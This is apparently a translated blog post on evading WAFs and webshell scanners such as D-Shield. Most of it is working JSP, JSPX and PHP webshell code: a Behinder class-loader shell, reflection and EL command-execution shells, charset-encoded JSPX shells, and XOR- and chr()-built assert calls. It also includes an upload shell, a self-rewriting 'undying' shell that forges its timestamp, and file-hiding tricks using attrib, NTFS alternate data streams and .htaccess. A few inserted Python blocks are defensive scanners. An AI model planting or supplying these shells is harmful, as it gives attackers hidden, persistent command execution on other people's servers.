Content bypass sharing
2022-07-28 01:40:00 【goddemon】
Typical interception situations
① The connection is reset directly
② The upload succeeds, but the URL of the uploaded page is blocked
That is, the page does not exist when you visit it
Content-bypass ideas
My understanding of how a WAF detects content:
How the WAF detects:
Dynamic detection –> the detection process inspects most of the request and response packets
Static detection –> hard blocking (when certain parameters or content are matched, the connection is reset directly) or weak detection (only part of the content is treated as sensitive and is still being tested)
What we usually have to deal with here is static detection
Webshell content detection evasion (免杀) bypass
JSP shells
① Basic knowledge points
Use the shell directly with Godzilla or Behinder (冰蝎)
Fix for Behinder failing to start:
https://blog.csdn.net/RABCDXB/article/details/122250489?spm=1001.2101.3001.6650.1&utm_medium=distribute.pc_relevant.none-task-blog-2%7Edefault%7ECTRLIST%7ERate-1-122250489-blog-119328054.pc_relevant_antiscanv2&depth_1-utm_source=distribute.pc_relevant.none-task-blog-2%7Edefault%7ECTRLIST%7ERate-1-122250489-blog-119328054.pc_relevant_antiscanv2&utm_relevant_index=2
How JSP executes commands
JSP tag basics
<%@ %> // page directive: sets page attributes and feature information
<% %> // Java code fragment (scriptlet); cannot declare methods
<%! %> // Java declaration; declares global variables or methods for the current page
<%= %> // Java expression
If a one-liner such as <% out.println(i)%> or the <%@ page%> directive is hard-blocked,
the only remaining options are an XML-format (jspx) shell, an EL-expression shell, or Unicode escapes for the bypass
② Common bypass ideas
① Bypass using language features directly
1. Bypass using common JSP features –> in my own tests this no longer works especially well: it can bring the detection level down to 2, but no lower
Unicode transcoding and parsing + line-feed handling + comment handling + base64 behaviour + code obfuscation
Common code obfuscation
ASCII
String a=new String(new byte[]{
121,122,100,100,77,114,54});
System.out.println("ASCII:"+a);
HEX
import javax.xml.bind.DatatypeConverter;
String b=new String(DatatypeConverter.parseHexBinary("797a64644d7236"));
System.out.println("HEX:"+b);
BASE64
import sun.misc.BASE64Decoder;
String c=new String(new BASE64Decoder().decodeBuffer("eXpkZE1yNG=="));
System.out.println("BASE64:"+c);
//① Splicing: the out and println parts are split across two scriptlets and joined when the page is compiled
<%out.%><% println("hello"); %>
//② Line feeds
// For example, an idea for downgrading the Behinder (冰蝎) shell
// Simply breaking the lines drops the detection level from 6 to 2 for the shell copied straight from Baidu, a direct way to evade detection
<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*,sun.misc.BASE64Decoder"%>
<%!class U extends ClassLoader
{
U(ClassLoader c){
super(c);
}
public Class g(byte []b)
{
return super.defineClass(b,0,b.length);
}
}%>
<%if (request.getMethod().equals("POST"))
{
String k="e45e329feb5d925b";
session.putValue("u",k);
Cipher c=Cipher.
getInstance("AES");
c.init(2,
new SecretKeySpec
(k.getBytes()
,"AES"));
BASE64Decoder encode
=new sun.misc .BASE64Decoder();
String requestString = request.getReader().readLine();
new U(this.getClass()
.getClassLoader()).
g(c.doFinal(encode.
decodeBuffer(requestString))).newInstance().equals(pageContext);
}%>
//③ The comment feature: use comments to obfuscate
// \u000d a="world";
// \u000a a="hello world!";
\u000d and \u000a are exactly the same as "\r" (carriage return) and "\n" (line feed) to the Java compiler, which processes Unicode escapes before it recognises comments
// That is, the code above is equivalent to the code below
public void testUnicode() {
String a = "Hello";
// \u000d a="world";
System.out.println(a);
// \u000a a="hello world!";
System.out.println(a);
}
public void testUnicode() {
String a = "Hello";
//
a="world";
System.out.println(a);
//
a="hello world!";
System.out.println(a);
}
//④ base64 behaviour
java: YQ==Yg== ————》ab
php: YQ==Yg== ————》 statement
The feature is that encoded chunks can be spliced:
a(base64)+b(base64)=ab
Bypass using Unicode escapes
But D盾 (D-Shield) now detects this fairly reliably
https://tool.leavesongs.com/
Characteristics:
//JSP supports Unicode escapes and line feeds
//A Unicode escape has the form \u0053, and \uuuuuuuuuuuuuuu0053 is also accepted, i.e. any number of u's works; a capital U is not supported, only lowercase u
// For example, xyz can be written as
x\u0079\u007a
\u0078y\u007a
\u0078\u0079z
\u0078\u0079\u007A
\u0078\uuuu0079\uuu007a
\uuuuu0078\uu0079z
\uuuuuuuuu0078yz
<% \u006f\u0075\u0074\u002e\u0070\u0072\u0069\u006e\u0074\u0028\u0031\u0032\u0033\u0029\u003b %> works as-is (the escapes decode to out.print(123);)
Source of the idea
https://www.cnblogs.com/piaomiaohongchen/p/13963476.html
Bypass code
https://blog.csdn.net/weixin_39933438/article/details/111049491
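Added example, not from the original post: a Python 3 canonicalizer that reproduces the Java compiler's Unicode-escape pass (any number of lowercase u's, backslash-parity rule), then strips comments, re-joins split scriptlets and removes whitespace before signature matching, so the \u000d comment trick, the out./println split and the line-broken Behinder shell above all collapse to the same plain text. The signature names and patterns are my own.

```python
import re

# Adjacent scriptlet boundary such as "<%out.%><% println": both fragments compile as one statement.
SPLIT_SCRIPTLET = re.compile(r"%>\s*<%(?![@!=])")
# A "//" comment whose body contains an escaped CR or LF: javac ends the comment there.
ESCAPED_TERMINATOR_IN_COMMENT = re.compile(r"//[^\r\n]*\\u+000[aAdD]")
# Signatures matched against the whitespace-free canonical form (names are my own).
SIGNATURES = {
    "jsp_out_print": re.compile(r"(?<![\w.])out\.print"),
    "runtime_exec": re.compile(r"Runtime\.getRuntime\(\)"),
    "classloader_define": re.compile(r"defineClass\("),
    "request_param": re.compile(r"request\.getParameter\("),
    "file_write": re.compile(r"FileOutputStream\("),
}
HEX = set("0123456789abcdefABCDEF")


def decode_java_unicode_escapes(src: str) -> str:
    """Javac's first pass: a backslash, one or more lowercase u, then four hex digits."""
    out, i, n = [], 0, len(src)
    while i < n:
        if src[i] != "\\":
            out.append(src[i])
            i += 1
            continue
        j = i
        while j < n and src[j] == "\\":
            j += 1
        # Only a backslash preceded by an even number of backslashes may start an escape.
        if (j - i) % 2 == 1 and j < n and src[j] == "u":
            k = j
            while k < n and src[k] == "u":          # any number of u's is accepted
                k += 1
            hexpart = src[k:k + 4]
            if len(hexpart) == 4 and set(hexpart) <= HEX:
                out.append(src[i:j - 1])            # keep the escaped backslash pairs
                out.append(chr(int(hexpart, 16)))
                i = k + 4
                continue
        out.append(src[i:j])
        i = j
    return "".join(out)


def canonicalize_jsp(src: str) -> str:
    """Decode escapes, then drop comments, merge split scriptlets and remove all whitespace."""
    decoded = decode_java_unicode_escapes(src)
    text = re.sub(r"/\*.*?\*/", "", decoded, flags=re.S)   # block comments, e.g. java.io./**/File...
    text = re.sub(r"//[^\r\n]*", "", text)                  # line comments end at a decoded CR or LF
    text = SPLIT_SCRIPTLET.sub("", text)
    return re.sub(r"\s+", "", text)


def scan_jsp(src: str) -> list:
    """Return sorted names of the evasion tricks and signatures seen in the source."""
    findings = set()
    decoded = decode_java_unicode_escapes(src)
    if decoded != src:
        findings.add("unicode_escapes")
    if ESCAPED_TERMINATOR_IN_COMMENT.search(src):
        findings.add("escaped_terminator_in_comment")
    if SPLIT_SCRIPTLET.search(decoded):
        findings.add("split_scriptlet")
    canon = canonicalize_jsp(src)
    for name, pattern in SIGNATURES.items():
        if pattern.search(canon):
            findings.add(name)
    return sorted(findings)
```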
2. jspx characteristics:
//① XML syntax supports entity encoding, so characters of the code can be written as XML entities
Process child = Runtime.getRuntime().exec(cmd);
//② CDATA
// Inside an XML element, < and & are illegal: on < the parser starts a new element, and on & it starts a character entity. But a jspx page sometimes needs JS code with many < and & characters, so the script can be declared as CDATA.
// The content of a CDATA section is not interpreted by the parser.
// Format: <![CDATA[xxxxxxxxxxxxxxxxxxx]]>
// That is, the text inside <![CDATA[xxxxxxxxxxxxxxxxxxx]]> is passed through uninterpreted, which can be used to split up a signature
For example
String cmd = request.getPar<![CDATA[ameter]]>("shell");
3. Other tips
https://www.jianshu.com/p/c0c566de4e97 (reference material)
- How to execute commands in jsp without using <% %> tags
- How to execute commands in jspx without using <jsp:scriptlet></jsp:scriptlet>
// Idea: bypass in jsp using EL expressions
//Common EL usage
https://www.jb51.net/article/105314.htm
<html>
<body>
${
Runtime.getRuntime().exec(pageContext.request.getParameter("cmd"))}
</body>
</html>
?cmd=calc // popping the calculator proves execution
//java turn el Ideas
//scriptengine
//${''.getClass().forName(param.aef).newInstance().getEngineByName("javascript").eval(param.aef1)}
<html>
<body>
aef1=try{
load("nashorn:mozilla_compat.js");}catch (e){
}importPackage(Packages.java.util);importPackage(Packages.java.lang);importPackage(Packages.java.io);s=[2];s[0]='cmd';s[1]='/c whoami /all';a="";b=java.lang.Runtime.getRuntime().exec(s).getInputStream();output+=+new BufferedReader(new+InputStreamReader(b));while ((line=output.readLine()) != null) {
a=a%2Bline%2B"\n"};a
</body>
</html>
//jspx bypass idea 1
// Rename the namespace prefix to bypass
// Principle: in <jsp:scriptlet>, jsp is only the default namespace prefix; it can be replaced with any other prefix
<bbb:root xmlns:bbb="http://java.sun.com/JSP/Page" version="1.2">
<bbb:scriptlet>
Runtime.getRuntime().exec(pageContext.request.getParameter("cmd"));
</bbb:scriptlet>
</bbb:root>
//jspx bypass idea 2
Use <jsp:expression> to bypass
i.e. write the expression into the jspx to bypass
<jsp:root xmlns:bbb="http://java.sun.com/JSP/Page" version="1.2">
<jsp:expression>
Runtime.getRuntime().exec(pageContext.request.getParameter("cmd"));
</jsp:expression>
</jsp:root>
JSP encoding features: there is also an encoding trick that gets past common upload-type checks. I haven't found an article on it yet; I'll look at it later.
XML format
#python2
charset = "utf-8"
data = '''<?xml version="1.0" encoding="UTF-8"?>
<jsp:root xmlns:jsp="http://java.sun.com/JSP/Page"
version="1.2">
<jsp:directive.page contentType="text/html"/>
<jsp:declaration>
</jsp:declaration>
<jsp:scriptlet>
Runtime.getRuntime().exec(request.getParameter("i"));
</jsp:scriptlet>
<jsp:text>
</jsp:text>
</jsp:root>'''.format(charset=charset)
f16be = open('utf-16be.jspx','wb')
f16be.write(data.replace('UTF-8','UTF-16be').encode('utf-16be'))
f16le = open('utf-16le.jspx','wb')
f16le.write(data.replace('UTF-8','UTF-16le').encode('utf-16le'))
fcp037 = open('cp037.jspx','wb')
fcp037.write(data.replace('UTF-8','CP037').encode('cp037'))
Ordinary jsp format
bypass idea, but I don't understand how this works
#python2
charset = "utf-8"
data = '''<%Runtime.getRuntime().exec(request.getParameter("i"));%>'''.format(charset=charset)
f16be = open('utf-16be.jsp','wb')
f16be.write('<%@ page contentType="charset=utf-16be" %>')
f16be.write(data.encode('utf-16be'))
f16le = open('utf-16le.jsp','wb')
f16le.write('<jsp:directive.page contentType="charset=utf-16le"/>')
f16le.write(data.encode('utf-16le'))
fcp037 = open('cp037.jsp','wb')
fcp037.write(data.encode('cp037'))
fcp037.write('<%@ page contentType="charset=cp037"/>')
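Added example, not from the original post: a Python 3 version of the sample construction above together with a scanner that decodes the file under every charset those scripts emit, so detection does not depend on the charset the file declares. The sample file names, marker names and the ASCII directive prefix (kept at an even length so the UTF-16 body stays aligned) are my own assumptions.

```python
import re

# Charsets the generator scripts above write; a scanner that assumes UTF-8 sees only the first.
CANDIDATE_CHARSETS = ("utf-8", "utf-16be", "utf-16le", "cp037")
MARKERS = {
    "page_directive": re.compile(r"<%@\s*page\b|<jsp:directive\.page\b"),
    "scriptlet_tag": re.compile(r"<jsp:scriptlet\b"),
    "runtime_exec": re.compile(r"Runtime\.getRuntime\(\)\.exec\("),
    "request_param": re.compile(r"request\.getParameter\("),
}
CODE_MARKERS = {"scriptlet_tag", "runtime_exec", "request_param"}
DECLARED = re.compile(r"(?:charset|encoding)=\"?([\w-]+)", re.I)

# Constructed samples, built the same way as the page's scripts (Python 3 bytes/str instead of Python 2).
JSPX_TEMPLATE = (
    '<?xml version="1.0" encoding="UTF-8"?>\n'
    '<jsp:root xmlns:jsp="http://java.sun.com/JSP/Page" version="1.2">\n'
    '<jsp:directive.page contentType="text/html"/>\n'
    '<jsp:scriptlet>\nRuntime.getRuntime().exec(request.getParameter("i"));\n</jsp:scriptlet>\n'
    "</jsp:root>"
)
JSP_BODY = '<%Runtime.getRuntime().exec(request.getParameter("i"));%>'


def build_samples() -> dict:
    return {
        "utf-16be.jspx": JSPX_TEMPLATE.replace("UTF-8", "UTF-16be").encode("utf-16be"),
        "cp037.jspx": JSPX_TEMPLATE.replace("UTF-8", "CP037").encode("cp037"),
        # ASCII directive followed by a UTF-16LE body, as in the "ordinary jsp" generator; the
        # prefix is 52 bytes, so the body stays 2-byte aligned (an odd prefix would need a
        # one-byte-offset decode as well).
        "utf-16le.jsp": b'<jsp:directive.page contentType="charset=utf-16le"/>' + JSP_BODY.encode("utf-16le"),
        "plain.jsp": b'<%@ page language="java" %>\n<html><body>hello</body></html>',
    }


def scan_charsets(data: bytes) -> dict:
    """Decode under every candidate charset and record the markers each decoding reveals."""
    hits = {}
    for charset in CANDIDATE_CHARSETS:
        text = data.decode(charset, errors="ignore")
        found = sorted(name for name, pattern in MARKERS.items() if pattern.search(text))
        if found:
            hits[charset] = found
    return hits


def declared_charsets(data: bytes) -> list:
    """Charsets the file itself declares, under whichever decoding makes the declaration readable."""
    names = set()
    for charset in CANDIDATE_CHARSETS:
        for m in DECLARED.finditer(data.decode(charset, errors="ignore")):
            names.add(m.group(1).lower())
    return sorted(names)


def evasion_charsets(data: bytes) -> list:
    """Non-UTF-8 charsets under which executable JSP constructs become visible."""
    return sorted(cs for cs, found in scan_charsets(data).items()
                  if cs != "utf-8" and CODE_MARKERS & set(found))
```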
② Code-level or obfuscation-level bypass ideas
Two articles from the Alibaba Security Response Center
http://www.52bug.cn/hkjs/6570.html
https://mp.weixin.qq.com/s/YhiOHWnqXVqvLNH7XSxC9w
1. Code-level bypass
Call ideas
Direct call
java.lang.Runtime
<% if("023".equals(request.getParameter("pwd"))){
java.io.InputStream in=Runtime.getRuntime().exec(request.getParameter("i")).getInputStream();
int a=-1;
byte[] b=new byte[2048];
out.print("<pre>");
while((a=in.read(b))!=-1){
out.println(new String(b));
}
out.print("</pre>");
}
%>
Implementation using java.lang.ProcessBuilder
The typical bypass methods used here: the most common are reflective calls + class loading
Reflective calls (used a lot in bypass webshells)
It is common to rewrite the code as reflection for execution
Reasons: two
① Obfuscated code can be wrapped around the reflection
② Java itself uses this idea, changing the execution path
The simplest way to evade detection with reflection:
// First feature --> calling the method via reflection
//Runtime rt = Runtime.getRuntime();
//String cmd = request.getParameter("cmd");
//Process process = rt.exec(cmd);
<%@ page language="java" pageEncoding="UTF-8" %>
<%
// Add a password
String PASSWORD = "password";
String passwd = request.getParameter("pwd");
String cmd = request.getParameter("cmd");
if (!passwd.equals(PASSWORD)) {
return;
}
// Reflective call --> the reflection idea
Class rt = Class.forName("java.lang.Runtime");
java.lang.reflect.Method gr = rt.getMethod("getRuntime");
java.lang.reflect.Method ex = rt.getMethod("exec", String.class);
Process process = (Process) ex.invoke(gr.invoke(null), cmd);
// Echo the output, as above
java.io.InputStream in = process.getInputStream();
out.print("<pre>");
java.io.InputStreamReader resultReader = new java.io.InputStreamReader(in);
java.io.BufferedReader stdInput = new java.io.BufferedReader(resultReader);
String s = null;
while ((s = stdInput.readLine()) != null) {
out.println(s);
}
out.print("</pre>");
%>
③ Special shells
Upload shell
<%@ page import="java.util.*,java.io.*" pageEncoding="UTF-8" contentType="text/html; charset=utf-8"%>
<%
request.setCharacterEncoding("utf-8");
String filePath = request.getParameter("filePath");
String content = request.getParameter("content");
String base64Flag = request.getParameter("base64");
String msg = "";
if(content != null){
try{
File file = new File(filePath);
OutputStream os = new FileOutputStream(file);
byte[] bytes = null;
if("on".equals(base64Flag)){
bytes = new sun.misc.BASE64Decoder().decodeBuffer(content);
}else{
bytes = content.getBytes("utf-8");
}
os.write(bytes);
os.close();
msg = "success";
}catch(Exception e){
msg = "error";
}
}
%>
<html>
<head>
</head>
<body>
<font color="red"><%=msg%></font>
<form action="" method="post">
<table>
<tr>
<td>Path of this page:</td>
<td><%=application.getRealPath("")%></td>
</tr>
<tr>
<td>Save path:</td>
<td><input type="text" size="60" name="filePath"/><input type="checkbox" name="base64"/>decode base64 and save</td>
</tr>
<tr valign="top">
<td>Shell content:</td>
<td><textarea rows="20" cols="70" name="content"></textarea></td>
</tr>
<tr align="right">
<td> </td>
<td><input type="submit" value="Save"/></td>
</tr>
</table>
</form>
</body>
</html>
-----------------------------------
Uploading binary files via base64 decoding in JSP
https://blog.51cto.com/0x007/1204440
Variant shell
<%
// Write the file into the current directory, the same directory as this jsp
String a=application.getRealPath(request.getServletPath())+"2.txt";
// Full path of the current jsp plus 2.txt, i.e. xx/xx.jsp2.txt
out.println(a);
String b=new String(new
sun.misc.BASE64Decoder().decodeBuffer(request.getParameter("c"))); //base64 Content
new java.io./**/FileOutputStream(a).write(b.getBytes());
%>
PHP shells
Basic knowledge points
① Difference between assert and eval
eval is a language construct, not a function, so it cannot be called as a variable function
assert is a function, so it can be called as a variable function
② Commonly used functions
String-transforming functions –> use them to transform the assert function name, e.g. reverse it
ucwords() // Function converts the first character of each word in a string to uppercase .
ucfirst() // Function to convert the first character in a string to uppercase .
trim() // Function to remove white space and other predefined characters from both ends of a string .
substr_replace() // Function to replace part of a string with another string
substr() // Function returns part of a string .
strtr() // Function to convert a specific character in a string .
strtoupper() // Function to convert a string to uppercase .
strtolower() // Function to convert a string to lowercase .
strtok() // Function splits a string into smaller strings
str_rot13() // Function on a string ROT13 code .
Callback functions –> use a callback to assemble the shell; array_map is the typical one
call_user_func_array()
call_user_func()
array_filter()
array_walk()
array_map()
register_shutdown_function()
register_tick_function()
filter_var()
filter_var_array()
uasort()
uksort()
array_reduce()
array_walk()
array_walk_recursive()
Common string-manipulation functions
ucwords() // Convert the first character of each word to uppercase
ucfirst() // Convert first character to uppercase
trim() // Remove the characters on both sides of the string
substr_replace() // Function to replace part of a string with another string
substr() // Function returns part of a string
strtr() // Function to convert a specific character in a string
strtoupper() // Convert all characters to uppercase
strtolower() // Convert all characters to lowercase
strtok() // Function splits a string into smaller strings
str_rot13() // Function on a string ROT13 code
chr() // From specified ASCII Value returns the character
hex2bin() // Convert hexadecimal values to ASCII character
bin2hex() //ASCII Character string converted to hexadecimal value
gzcompress()、gzdeflate()、gzencode() // String compression
gzuncompress()、gzinflate()、gzdecode() // String decompression
base64_encode() //base64 code
base64_decode() //base64 decode
pack() // Data is loaded into a binary string
unpack() // Unpacking data from binary strings
// Compression functions
<?php
$a = gzcompress("abc");
echo " After the compression : ".$a;
echo "<br> After decompressing : ".gzuncompress($a);
?>
<?php
$func = gzuncompress(base64_decode($_GET["func"]));
$a = "a";
$s = "s";
$c=$a.$s.$_GET["func2"];
$c($func);
?>
//② Custom encryption and decryption
<?php
// The string to encrypt
$data = 'demo';
// secret key
$key = '123456';
// Encrypt data 'AES-128-ECB' Can pass openssl_get_cipher_methods() obtain
$encrypt = openssl_encrypt($data, 'AES-128-ECB', $key, 0);
echo " After encryption : ".$encrypt;
// secret key
$key = '123456';
// Decrypt data
$decrypt = openssl_decrypt($encrypt, 'AES-128-ECB', $key, 0);
echo "<br> After decryption : ".$decrypt;
Practical use
<?php
$key = "password";
$fun = openssl_decrypt($_GET['func'], 'AES-128-ECB', $key, 0);
$a = "a";
$s = "s";
$c=$a.$s.$_GET["func2"];
$c($fun);
//③ XOR encryption
<?php
$key = "password";
//ERsDHgEUC1hI
$fun = base64_decode($_GET['func']);
for($i=0;$i<strlen($fun);$i++){
$fun[$i] = $fun[$i]^$key[$i+1&7];
}
$a = "a";
$s = "s";
$c=$a.$s.$_GET["func2"];
$c($fun);
③ Attack principle ideas
General ideas:
1. Encoding: generate the payload with base64_decode()-style encoding
2. Build a signature-free payload with XOR
e.g. assert produced by XOR to get a one-liner past detection, or chr()-built characters
<? @("Y;HJ(Z"^"8H;/Z.")(${"~?}$"^"!x8p"}[1]); // the two XORs evaluate to assert and _GET
# For example the following
// Principle: $t="base64_"."decode"; i.e. the same as at the start
$t='{{{{{{{{{{{{{'^chr(25).chr(26).chr(8).chr(30).chr(77).chr(79).chr(36).chr(31).chr(30).chr(24).chr(20).chr(31).chr(30); // thirteen '{' XOR the chr() string = base64_decode
Custom variables –> i.e. the post[1] style ideas
#① Typical technique
Cut the string up, then join it back together
#② Obtain it from another function or a define()d constant
#③ Join it after several regex matches and replacements
Custom functions
① assert: bypass via the callback-function or string-transform idea above --> the most typical method
# There are many clever tricks of this kind, such as this one
<?php
/* 97 = a 65 = A 115 = s 83 = S 101 = e 69 = E 114 = r 82 = R 116 = t 84 = T */
$a = chr(65).chr(83).chr(83);//ASS
$b = chr(69).chr(82).chr(84);//ERT
$c = strtolower($a.$b);//assert
$aa = array($_GET['x']);
array_map($D = $c,$DD = $aa );
//strtolower(): converts every character of the string argument to lowercase and returns the lowercase string
//strtoupper(): the opposite of strtolower; converts every character of the argument to uppercase
?>
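Added example, not from the original post: a Python 3 constant folder for the PHP string expressions this section relies on (string XOR, chr() concatenation, strtolower/strrev/str_rot13/base64_decode), so a scanner can recover which function name a dynamically built call such as the XOR assert, the chr() ASSERT and the base64_decode payloads above resolves to. The supported function list and the CALLABLES set are my own choices.

```python
import base64
import codecs
import re

TOKEN = re.compile(r"""\s*(?:(?P<str>'(?:[^'\\]|\\.)*'|"(?:[^"\\]|\\.)*")
    |(?P<num>\d+)|(?P<name>[A-Za-z_]\w*)|(?P<op>[().^,]))""", re.VERBOSE)
# Names worth flagging when a folded string is used as a callable (my own list).
CALLABLES = {"assert", "eval", "system", "exec", "shell_exec", "passthru",
             "popen", "proc_open", "create_function", "preg_replace"}


def _b64(a: str) -> str:
    clean = re.sub(r"[^A-Za-z0-9+/]", "", a)          # PHP non-strict mode skips invalid chars
    return base64.b64decode(clean + "=" * (-len(clean) % 4)).decode("latin-1")


# Single-argument string functions this folder understands (all pure, so folding is safe).
FUNCS = {
    "chr": lambda a: chr(int(a) % 256),
    "strtolower": str.lower,
    "strtoupper": str.upper,
    "strrev": lambda a: a[::-1],
    "str_rot13": lambda a: codecs.encode(a, "rot_13"),
    "ucfirst": lambda a: a[:1].upper() + a[1:],
    "trim": lambda a: a.strip(" \t\n\r\0\x0b"),
    "base64_decode": _b64,
}


class _Parser:
    """expr := concat ('^' concat)* ; concat := atom ('.' atom)*  (PHP binds '.' tighter than '^')."""

    def __init__(self, expr: str):
        self.toks, self.i, pos = [], 0, 0
        expr = expr.strip()
        while pos < len(expr):
            m = TOKEN.match(expr, pos)
            if not m:
                raise ValueError(f"cannot tokenize at {pos}: {expr[pos:pos + 10]!r}")
            pos = m.end()
            self.toks.append((m.lastgroup, m.group(m.lastgroup)))

    def peek(self):
        return self.toks[self.i] if self.i < len(self.toks) else (None, None)

    def take(self, expected=None):
        tok = self.peek()
        if tok[0] is None or (expected and tok != expected):
            raise ValueError(f"unexpected token {tok[1]!r}")
        self.i += 1
        return tok[1]

    def expr(self) -> str:
        left = self.concat()
        while self.peek() == ("op", "^"):
            self.take()
            right = self.concat()           # PHP string XOR is byte-wise over the shorter operand
            left = "".join(chr(ord(x) ^ ord(y)) for x, y in zip(left, right))
        return left

    def concat(self) -> str:
        value = self.atom()
        while self.peek() == ("op", "."):
            self.take()
            value += self.atom()
        return value

    def atom(self) -> str:
        kind, text = self.peek()
        if kind == "str":                   # only \\ and \' / \" escapes occur in these shells
            return re.sub(r"\\([\\'\"])", r"\1", self.take()[1:-1])
        if kind == "num":
            return self.take()
        if kind == "name":
            fn = FUNCS.get(self.take().lower())
            self.take(("op", "("))
            args = [] if self.peek() == ("op", ")") else [self.expr()]
            while self.peek() == ("op", ","):
                self.take()
                args.append(self.expr())
            self.take(("op", ")"))
            if fn is None:
                raise ValueError(f"unsupported function {text}()")
            return fn(args[0] if args else "")
        if (kind, text) == ("op", "("):
            self.take()
            value = self.expr()
            self.take(("op", ")"))
            return value
        raise ValueError(f"unexpected token {text!r}")


def fold_php_string(expr: str) -> str:
    """Evaluate a constant PHP string expression to the string PHP would see at runtime."""
    parser = _Parser(expr)
    value = parser.expr()
    if parser.peek()[0] is not None:
        raise ValueError("trailing tokens")
    return value


def resolves_to_callable(expr: str):
    """Dangerous function name the expression folds to, else None (PHP names are case-insensitive)."""
    try:
        name = fold_php_string(expr).strip().lower()
    except ValueError:
        return None
    return name if name in CALLABLES else None
```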
② About wrapping eval
# This can only be done with a special call-chain idea
Put eval() inside another function or a class method to bypass --> the typical methods are constructors and magic methods
Typical are class const references and dynamic chained calls
Obfuscation ideas: ways of disturbing the signature
#① Introduce classes or functions that do something ordinary to confuse the code
#③ Introduce ordinary code as a distraction, e.g.
public $x="";
public $y="";
#② Introduce special characters as interference --> e.g.
Y---W|@^^!@#$%^&* Me me |E=)))(((————》aa
# Principle: PHP ignores certain special symbols, so the input can still be turned into the intended base64 string
<?php
$c="NULL";
$s=
substr ("aabbccsystem".null,"0x6");
null.$s/*0*/(null.
$_GET/**/
['cmd'/*1*/]/*2*/);
?>
<?php
$zeo='1';
$$zeo=$_POST['x']; // creates a variable whose name is "1"
eval(NULL.``.${1}); // ${1} reads that variable (a bare $1 does not parse)
?>
Special tricks
① Version-difference bypass
Versions below php 5.2 can parse this
<?php
\echo `whoami`;?>
#② Hexadecimal strings
# Principle: php7 does not treat "0x6" as a number, php5 still does
# Tested: 5.3 and 5.5 execute the command successfully, 5.2 and php7 cannot
<?php
$s=substr("aabbccsystem","0x6");
$s($_GET['cmd']);
?>
#③ list() assignment direction
<?php
$info=array("dir","whoami");
list($a[0],$a[1])=$info;
SYSTEM(END($a))
?>
php 5 output: runs dir
php 7 output: runs whoami
#④ Bypasses AF for command execution on 7.3.4; on other versions echo must be followed by a newline
<?=
$a=<<< aa
assasssasssasssasssasssasssasssasssasssasssassss
aa;echo `whoami`
?>
##⑤ Get the function from an external table
# Pick the function by its index, which depends on the PHP version
<?php
$arr = get_defined_functions()['internal'];
//var_dump($arr);
$arr[457]($_GET['cmd']);
② Other tips
# Scientific notation
<?php
$arr[0]='1';
$arr[99999e9999999]=$_GET[1];
@eval("".$arr[0]."");
echo $arr[0];
echo $arr[99999e9999999];
# Because 99999e9999999 ends up as array index 0 here, this kind of idea can be used to bypass
XOR feature
git clone https://github.com/devploit/XORpass
cd XORpass
$ python3 xorpass.py -h
1.) Typical shell content
① PHP's five opening tags
Five opening tags
<?php phpinfo();?>
<script language='php'>phpinfo();</script>
<?=phpinfo()?>
<?phpinfo()?>
<%=phpinfo()%>
② One-liner shells
<?php @eval($_POST['hacker']); ?>
<?php assert($_REQUEST["pass"]);?> AntSword needs an encoder to connect; Cknife does not
<?php echo `$_=$_REQUEST[baby]`; ?>
<?php
$b=1;$a=$_POST;extract($a);print_r(`$b`);?>
③ The shortest one-liner
<?=`$_GET[1]`;
④ The undying shell (不死马)
<?php
set_time_limit(0); // script time limit; 0 means no limit
ignore_user_abort(1); // the script keeps running after the client disconnects
unlink(__FILE__); // then delete this file itself
$file = '/var/www/html/.shell.php';
//$file = 'D:\phpstudy_pro\WWW\h\.shell.php';
$code = '<?php @eval($_POST["pwd"]);?>'; // inner quotes changed so the literal parses
while (1) {
file_put_contents($file, $code); // write the shell file
system('touch -m -d "2020-10-19 13:50:11" .shell.php'); // modify the timestamp
usleep(1000); // sleep for the given number of microseconds
}
?>
2.) Understanding the features
① Difference between single and double quotes
<?php
$a = '123';
$b = '$a';
$c = "$a";
echo $b;
echo '<br>';
echo $c;
?>
Output: in single quotes the text is taken as literal characters, not as a variable name; in double quotes it is treated as a variable
$a
123
② Common evasion features
My understanding of the essence: obfuscate how the code is executed
Common ones are
1. Wrap the executing code in a function or class, i.e. the three below: variable variables, variable functions, self-written functions
2. Encrypt, then decrypt and execute
1、 Variable variables
<?php
$b = "assert";
$a = 'b';
$$a($_POST['hacker']);
?>
2、 Variable functions
@$_GET['a']($_GET['cmd']);
http://127.0.0.1/1.php?a=system&cmd=whoami
3、 Self-written function
<?php
function test($a){
$a($_POST['x']);
}
test(assert);
?>
ucwords() // Function converts the first character of each word in a string to uppercase
ucfirst() // Function to convert the first character in a string to uppercase
trim() // Function to remove white space and other predefined characters from both ends of a string
substr_replace() // Function to replace part of a string with another string
substr() // Function returns part of a string
strtr() // Function to convert a specific character in a string
strtoupper() // Function to convert a string to uppercase
strtolower() // Function to convert a string to lowercase
strtok() // Function splits a string into smaller strings
str_rot13() // Function on a string ROT13 code
explode // Scatter the string into an array
3.) Earlier bypass tips
Currently gets past 河马 (HeMa webshell scanner)
<?php
$a=end($_REQUEST);
eval($a);
?>

## Principle analysis:
#① ReflectionClass creates a reflection of the user class
#② The built-in getDocComment fetches the doc comment
#③ substr then cuts the payload out of that value
#④ Finally eval (here assert) executes it
<?php
/** * assert($_GET[1+0]); */
class User {
}
$user = new ReflectionClass('User');
$comment = $user->getDocComment();
$d = substr($comment , 14 , 20);
assert($d);
?>
# The connection password for all these php shells is 1
#?1=phpinfo();
# Principle: the value is base64-decoded automatically on instantiation, i.e. analyse the bypass from the decoding side
<?php
class people{
public $name;
public $age;
public function __construct($name){
$this->name=base64_decode($name);
}
}
foreach ($_REQUEST as $key => $value) {
$$key=$value;
};
$stu=new people('YXNzZXJ0');
$stu1=$stu->name;
$stu1($key);
?>
# Usage
#http://127.0.0.1/2.php?key=phpinfo();
Earlier dynamic-chain ideas
<?php
class Test{
public static function a(){
$a = base64_decode/*/\*/($_POST/*\*/['a']);
return $a;
}
}
$func = 'a';
$classname = 'Test';
$a =$classname::$func();
eval/*\/*/($a);
?>
## Still bypasses D盾 (D-Shield) at present
<?php
class test{
const name='eval(end($_REQUEST));';
}
eval(test::name);
?>
Hiding tips
1. Hide the php file
On Windows
attrib +s +a +h +r shell.php # hide
attrib -s -a -h -r shell.php # show
2. ADS hiding
NTFS alternate data streams on Windows are a good way to hide data. From the command line:
echo ^<?php @eval($_POST['pwd']);?^> > shell.php:123.jpg
<?php include('shell.php:123.jpg');?>
3. Using .htaccess, .user.ini and php.ini
Modify the .htaccess file
AddType application/x-httpd-php .jpg # runs .jpg files as PHP code.
php_value auto_append_file D:/123.txt # automatically includes the file.
